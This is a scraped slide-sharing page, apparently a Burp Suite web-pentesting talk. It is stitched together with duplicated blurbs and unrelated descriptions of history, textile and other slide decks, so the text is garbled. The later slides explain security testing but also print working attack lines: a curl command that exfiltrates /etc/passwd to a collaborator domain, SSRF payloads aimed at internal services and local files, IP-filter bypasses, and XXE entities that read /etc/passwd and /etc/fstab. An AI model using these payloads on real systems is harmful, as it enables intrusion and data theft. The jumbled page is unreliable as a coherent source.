This document provides an overview of Burp Suite and how to use its features to perform vulnerability assessments. It discusses Burp Suite's key components like the proxy, scanner, intruder, repeater, collaborator, and extender. It also covers techniques like bypassing filters, server-side request forgery, XML external entities, and common vulnerabilities to target like open redirects, insufficient entropy, and insecure deserialization.
Burp Suite is an integrated platform for performing security testing of web applications. It is designed to support the methodology of a hands-on tester, and gives you complete control over the actions that it performs, and deep analysis of the results. Burp contains several tools that work together to carry out virtually any task you will encounter in your testing. It can automate all kinds of tasks in customizable ways, and lets you combine manual and automated techniques to make your testing faster, more reliable and more fun.
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
Burp Suite is an integrated platform for performing security testing of web applications. It is designed to support the methodology of a hands-on tester, and gives you complete control over the actions that it performs, and deep analysis of the results. Burp contains several tools that work together to carry out virtually any task you will encounter in your testing. It can automate all kinds of tasks in customizable ways, and lets you combine manual and automated techniques to make your testing faster, more reliable and more fun.
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
In this talk, we’ll walk through utilizing one of the most popular web vulnerability testing frameworks BurpSuite. During this presentation we will cover the process of how to conduct a successful web penetration tests, while utilizing BurpSuite's features and tools (Free and Pro Version). This discussion will also cover realistic examples and a brief overview of common vulnerabilities found in web applications.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
Brief overview of API
▸ Fingerprinting & Discovering API
▸ Authentication attacks on API (JWT)
▸ Authorization attacks on API (OAuth)
▸ Bruteforce attacks on API
▸ Attacking Dev/Staging API
▸ Traditional attacks
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]raj upadhyay
What is ZAP(Zed Attack Proxy)?An easy to use web application pentest tool.
Completely free and open source.
An OWASP(Open Web Application Security Project) flagship project.
Ideal for beginners.
But also used by professionals.
Becoming a framework for advanced testing.
Companion slides for Stormpath CTO and Co-Founder Les REST API Security Webinar. This presentation covers all the RESTful best practices learned building the Stormpath APIs. This webinar is full of best practices learned building the Stormpath API and supporting authentication for thousands of projects. Topics Include:
- HTTP Authentication
- Choosing a Security Protocol
- Generating & Managing API Keys
- Authorization & Scopes
- Token Authentication with JSON Web Tokens (JWTs)
- Much more...
Stormpath is a User Management API that reduces development time with instant-on, scalable user infrastructure. Stormpath's intuitive API and expert support make it easy for developers to authenticate, manage and secure users and roles in any application.
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
In this talk, we’ll walk through utilizing one of the most popular web vulnerability testing frameworks BurpSuite. During this presentation we will cover the process of how to conduct a successful web penetration tests, while utilizing BurpSuite's features and tools (Free and Pro Version). This discussion will also cover realistic examples and a brief overview of common vulnerabilities found in web applications.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
Brief overview of API
▸ Fingerprinting & Discovering API
▸ Authentication attacks on API (JWT)
▸ Authorization attacks on API (OAuth)
▸ Bruteforce attacks on API
▸ Attacking Dev/Staging API
▸ Traditional attacks
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]raj upadhyay
What is ZAP(Zed Attack Proxy)?An easy to use web application pentest tool.
Completely free and open source.
An OWASP(Open Web Application Security Project) flagship project.
Ideal for beginners.
But also used by professionals.
Becoming a framework for advanced testing.
Companion slides for Stormpath CTO and Co-Founder Les REST API Security Webinar. This presentation covers all the RESTful best practices learned building the Stormpath APIs. This webinar is full of best practices learned building the Stormpath API and supporting authentication for thousands of projects. Topics Include:
- HTTP Authentication
- Choosing a Security Protocol
- Generating & Managing API Keys
- Authorization & Scopes
- Token Authentication with JSON Web Tokens (JWTs)
- Much more...
Stormpath is a User Management API that reduces development time with instant-on, scalable user infrastructure. Stormpath's intuitive API and expert support make it easy for developers to authenticate, manage and secure users and roles in any application.
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
Attackers don’t just search for technology vulnerabilities, they take the easiest path and find the human vulnerabilities. Drive by web attacks, targeted spear phishing, and more are commonplace today with the goal of delivering custom malware. In a world where delivering custom advanced malware that handily evades signature and blacklisting approaches, and does not depend on application software vulnerabilities, how do we understand when are environments are compromised? What are the telltale signs that compromise activity has started, and how can we move to arrest a compromise in progress before the attacker laterally moves and reinforces their position? The penetration testing community knows these signs and artifacts of advanced malware presence, and it is up to us to help educate defenders on what to look for.
Attendees will learn the best web application security practices used by major US government entities. The presentation will cover network configuration, caching, replication, common web application vulnerabilities, and how making these changes will result in better web site performance and user satisfaction. The five most common types of web application attacks will be explained, along with simple ways to prevent them.
Ever wanted to find out someone’s IP address online? Of course you have! Tracing “calls” on the Internet is much more complicated than on the plain old telephone network. This expose` includes a history of traditional techniques used to discover the IP address of a target user in: chat rooms, forums and other types of social networking sites. Attention will be centered around a fundamental weakness in the IRC protocol that allows client IP addresses to be determined. Proof-of-concept samples targetting multiple IRC daemons will be released. Prizes will be awarded to the most interesting submissions for an online edition of ‘Spot The Fed.’
Bio: At the time of writing, Derek is currently an independent security contractor (and in the past for @stake and Symantec.) He’s written various tool packages including a Linux stealth patch to evade nmap’s transport layer OS detection as well as porkbind, a nameserver security scanner. In 2007, he won Cenzic’s SANS contest.
CNIT 129S - Ch 3: Web Application TechnologiesSam Bowne
For a college course at CCSF taught by Sam Bowne.
https://samsclass.info/129S/129S_S18.shtml
Based on "The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd Edition", by Dafydd Stuttard , Marcus Pinto; ISBN-10: 1118026470
Pradeep Sharma from OSSCube presents on Securing your web server at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
A Hacker's Perspective on Embedded Device Security, presented by Paul Dant of Independent Security Evaluators at the Security of Things Forum, Sept. 10, 2015
Slides for a college course based on "Incident Response & Computer Forensics, Third Edition" by by Jason Luttgens, Matthew Pepe, and Kevin Mandia, at City College San Francisco.
Website: https://samsclass.info/152/152_F18.shtml
This presentation is part of one of talk, I gave in Microsoft .NET Bootcamp. The contents are slightly edited to share the information in public domain. In this presentation, I tried to cover Application Security Tools that can be helpful for analyzing security threats as well as putting up some defense . This presentation will be useful for software architects/Managers,developers and QAs. Do share your feedback in comments.
The French Revolution, which began in 1789, was a period of radical social and political upheaval in France. It marked the decline of absolute monarchies, the rise of secular and democratic republics, and the eventual rise of Napoleon Bonaparte. This revolutionary period is crucial in understanding the transition from feudalism to modernity in Europe.
For more information, visit-www.vavaclasses.com
The Roman Empire A Historical Colossus.pdfkaushalkr1407
The Roman Empire, a vast and enduring power, stands as one of history's most remarkable civilizations, leaving an indelible imprint on the world. It emerged from the Roman Republic, transitioning into an imperial powerhouse under the leadership of Augustus Caesar in 27 BCE. This transformation marked the beginning of an era defined by unprecedented territorial expansion, architectural marvels, and profound cultural influence.
The empire's roots lie in the city of Rome, founded, according to legend, by Romulus in 753 BCE. Over centuries, Rome evolved from a small settlement to a formidable republic, characterized by a complex political system with elected officials and checks on power. However, internal strife, class conflicts, and military ambitions paved the way for the end of the Republic. Julius Caesar’s dictatorship and subsequent assassination in 44 BCE created a power vacuum, leading to a civil war. Octavian, later Augustus, emerged victorious, heralding the Roman Empire’s birth.
Under Augustus, the empire experienced the Pax Romana, a 200-year period of relative peace and stability. Augustus reformed the military, established efficient administrative systems, and initiated grand construction projects. The empire's borders expanded, encompassing territories from Britain to Egypt and from Spain to the Euphrates. Roman legions, renowned for their discipline and engineering prowess, secured and maintained these vast territories, building roads, fortifications, and cities that facilitated control and integration.
The Roman Empire’s society was hierarchical, with a rigid class system. At the top were the patricians, wealthy elites who held significant political power. Below them were the plebeians, free citizens with limited political influence, and the vast numbers of slaves who formed the backbone of the economy. The family unit was central, governed by the paterfamilias, the male head who held absolute authority.
Culturally, the Romans were eclectic, absorbing and adapting elements from the civilizations they encountered, particularly the Greeks. Roman art, literature, and philosophy reflected this synthesis, creating a rich cultural tapestry. Latin, the Roman language, became the lingua franca of the Western world, influencing numerous modern languages.
Roman architecture and engineering achievements were monumental. They perfected the arch, vault, and dome, constructing enduring structures like the Colosseum, Pantheon, and aqueducts. These engineering marvels not only showcased Roman ingenuity but also served practical purposes, from public entertainment to water supply.
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdfTechSoup
In this webinar you will learn how your organization can access TechSoup's wide variety of product discount and donation programs. From hardware to software, we'll give you a tour of the tools available to help your nonprofit with productivity, collaboration, financial management, donor tracking, security, and more.
Synthetic Fiber Construction in lab .pptxPavel ( NSTU)
Synthetic fiber production is a fascinating and complex field that blends chemistry, engineering, and environmental science. By understanding these aspects, students can gain a comprehensive view of synthetic fiber production, its impact on society and the environment, and the potential for future innovations. Synthetic fibers play a crucial role in modern society, impacting various aspects of daily life, industry, and the environment. ynthetic fibers are integral to modern life, offering a range of benefits from cost-effectiveness and versatility to innovative applications and performance characteristics. While they pose environmental challenges, ongoing research and development aim to create more sustainable and eco-friendly alternatives. Understanding the importance of synthetic fibers helps in appreciating their role in the economy, industry, and daily life, while also emphasizing the need for sustainable practices and innovation.
Palestine last event orientationfvgnh .pptxRaedMohamed3
An EFL lesson about the current events in Palestine. It is intended to be for intermediate students who wish to increase their listening skills through a short lesson in power point.
Operation “Blue Star” is the only event in the history of Independent India where the state went into war with its own people. Even after about 40 years it is not clear if it was culmination of states anger over people of the region, a political game of power or start of dictatorial chapter in the democratic setup.
The people of Punjab felt alienated from main stream due to denial of their just demands during a long democratic struggle since independence. As it happen all over the word, it led to militant struggle with great loss of lives of military, police and civilian personnel. Killing of Indira Gandhi and massacre of innocent Sikhs in Delhi and other India cities was also associated with this movement.
10. HTTP Strict Transport Security
• Web security mechanism to prevent
• Man in the middle attack
• Visiting site by HTTP
• Visiting site by invalid certificate
• Since the BurpSuite does MITM, HSTS stops it
10
11. How to remove HSTS
• Exporting and installing Burp’s CA certificate
• Demo time :)
11
12. HOL - Inappropriate error handling
• Searching through the logs
• Watching the responses carefully
• Chasing the responses
• Let’s hack :)
12
13. HOL - Execution after Redirect
• JavaScript redirects are not safe
• Browsers always follow the redirects
• But attackers not
• Ignoring redirects and retrieving sensitive content
• Searching through the logs
• Let’s hack :)
13
14. Removing Tools Signature
• Tools produce signatures
• The BurpSuite can be in the middle to
• Capturing the tool/script traffic
• Modifying the traffic
• Removing signatures
14
16. Repeater
• It repeats the requests
• Manipulating and reissuing HTTP and WebSocket messages
• Good choice to discover IDOR
16
17. Insecure Direct Object Reference
• Direct access to objects based on user-supplied input
• http://foo.bar/somepage?invoice=12345
• User ID in JSON/XML formats
• Downloading a file by the name
• Let’s see a case
• https://hackerone.com/reports/287789
17
19. Intruder
• Automating customized attacks against web applications
• Extremely powerful and configurable
• Brute-force guessing
• Fuzzing dir, files and paths
• Exploiting blind SQLi (here)
• Multi thread, delay, payloads and etc
19
20. Intruder Options
• Burp’s intruder has several options, use
• Sniper to fuzz a single input
• Battering ram to custom attacks
• Pitchfork for leaked credentials
• Cluster bomb for separated lists
• Demo time :)
20
22. Conducting a Brute Force
• Get a username list
• Get a password list
• Brute force and endpoint to find valid credentials
• Let’s hack :)
22
23. Fuzzing Hidden Files and Dias
• Fuzz for directories
• Fuzz inside directory by [fuzz].[ext]
• Fuzz inside directory by [fuzz]
• Fuzz web service methods by [fuzz]
• Let’s hack :)
23
24. Fuzzing Vague Values
• Some websites have vague values
• Base64 inputs
• Hash inputs
• There are several processor for payloads
• Let’s hack :)
24
25. Burp Collaborator
• A network service to discover vulnerabilities
• It captures Out of Band (OOB) requests
• HTTP(s) requests
• DNS lookups
• Uses a valid, CA-signed, wildcard TLS certificate
• Useful to find SSRF, XXE, blind XSS and etc
25
27. How to send data out of the server through HTTP/DNS?
27
28. Burp Collaborator
• It provides an address
• [unique].burpcollaborator.net
• zpsh3143whnrugrsbrjkadsa016suh.burpcollaborator.net
• The burpcollaborator.net domain might be filtered
• Can be used to steal information
• curl domain.tld -d "`cat /etc/passwd | base64 -w 0`”
• nslookup [hexdata].domain.tld
28
29. Sequencer
• Analyzing the quality of randomness
• Application's session tokens
• Anti-CSRF tokens
• Password reset tokens
• Demo time :)
29
31. Extender
• To extend Burp's functionality using third-party code
• Languages: Python, Ruby and Java
• There are good plugins, such as Active Scan++
• Demo time :)
31
32. Options
• There are some useful options
• Upstream or Socks proxy are good
• Demo time :)
32
34. Open Redirect
• Known as Unvalidated Redirects and Forwards
• Redirect a user to a website without any validation
• Exploit? Depending on the architecture of website
• https://site.tld/r?URI=https%3A%2F%2Fwww.google.com
• Usually URI parameter is protected by a REGEX
• The REGEX should not be vulnerable :)
34
35. How SSO and oAuth bleed?
• Open Redirect :)
35
36. Vulnerable REGEX
• (Server side) Steps to redirect
• Extracting the host from URL
• Checking the host by whitelist
• Permission of the redirect
• Can you spot the vulnerability?
• https?://(www.)?(?P<host>[a-z0-9.-_]*)(/.*)?
36
40. Introduction
• The ability to create requests from the vulnerable server to
intra/internet
• Interacting to:
• Cloud server meta-data
• Database HTTP interfaces
• Internal REST interfaces
• Reading files
• Scanning internal IP/Port
40
44. Attack Example
• The code is vulnerable to SSRF
• Normal usage:
• https://site.com/?url=index
• Attack vector:
• https://site.com/?url=http://127.0.0.1:9200/
• https://site.com/?url=http://127.0.0.1:8080/manager/
44
45. Various Schemes
• Protocols can extent the attack surface of SSRF
• Example:
• https://site.com/?url=file:///etc/passwd
• https://site.com/?url=dict://localhost:3779/
45
46. Schemes
• Protocols can extent the attack surface of SSRF
• file:/// -> Allows an attacker to fetch the content of a file on the server
• dict:// -> Used to refer to word lists available using the DICT protocol
• sftp:// -> Used for secure file transfer over secure shell
• ldap:// -> Lightweight Directory Access Protocol
• tftp:// -> Trivial File Transfer Protocol, works over UDP
• gopher:// -> designed for distributing, searching, and retrieving documents
• http:// -> Used to fetch any content from the web
• https:// -> Same as the http
46
47. Detection
• Listen a common port in the server
• Put the https://ip in the URL-like inputs
47
48. Filters
• Some filters forbid:
• Sending requests to internal IP addresses
• Changing URL scheme
• Sending requests to Not white-listed domains
• https?://(www.)?domain.com/.+
• https?://.+?.?domain.com/.+
48
50. Bypass Filters 1
• Internal IP address filters
• Using domain instead of IP address
• The xip.io is a magic DNS server
• dig A 10.0.0.1.xip.io
• dig A anything.10.0.0.1.xip.io
• dig A 1ynrnhl.xip.io (base32(int(‘254.169.254.169’)))
• Open Redirect in white-listed domains
• Alternate IP addresses:
• 127.1 or 0x7F000001
• http://[::1]/ or http://[::]/
50
51. Bypass Filters 2
• Scheme filters
• Can by bypassed by server-side redirect:
• https://domain.tld/?url=https://attacker.tld/r.php
• r.php contents:
51
55. XML External Entity
• XML (Extensible Markup Language) is a very popular data
format.
• Some applications use the XML format to transmit data
between the browser and the server.
• Altering XML may lead to XXE
• XXE allows an attacker to interfere with an
application's processing of XML data.
• XML specification contains various potentially
dangerous features.
55
56. Saving the XML File
Response
Parsing the XML File
Web Service
Backend Server
56
57. XML External Entity
POST /endpoint HTTP/1.1
<foo>
Hello World
</foo>
HTTP/1.1 200 OK
Hello World
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>
HTTP/1.1 200 OK
Hello World
57
58. XML External Entity
• It seems harmless?
• XML parsers are configured to process external entities
• System identifier: is a document-processing construct
• There are two identifiers in XML:
• Public
• System
• A SYSTEM identifier specifies the exact location of file
58
59. XML External Entity
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
HTTP/1.0 200 OK
root:x:0:0:root:/root:/
bin/bash
daemon:x:1:1:daemon:/usr/
sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
59
60. PHP Wrappers
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>
HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0g
aW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3R...
60
61. XML External Entity
• Attackers are not limited to system files
• Some XML parsers, it’s even possible to get directory
listings
• Attackers can also send HTTP(s) requests by
• http://
• https://
• gopher://
• dict://
61
62. Directory Listing
• Some parsers allow directory listing in XXE
• <!ENTITY % file SYSTEM “file:///etc/“>
62
63. More Scenarios
• Many applications support a “File Upload” functionality
• XLSX, DOCX, PPTX, SVG or any XML MIME type formats
• The application processes files
• These files have an XML MIME type
• An attacker could take advantage of the XML
• root-me.org, SamBox-v3 is a good example
63
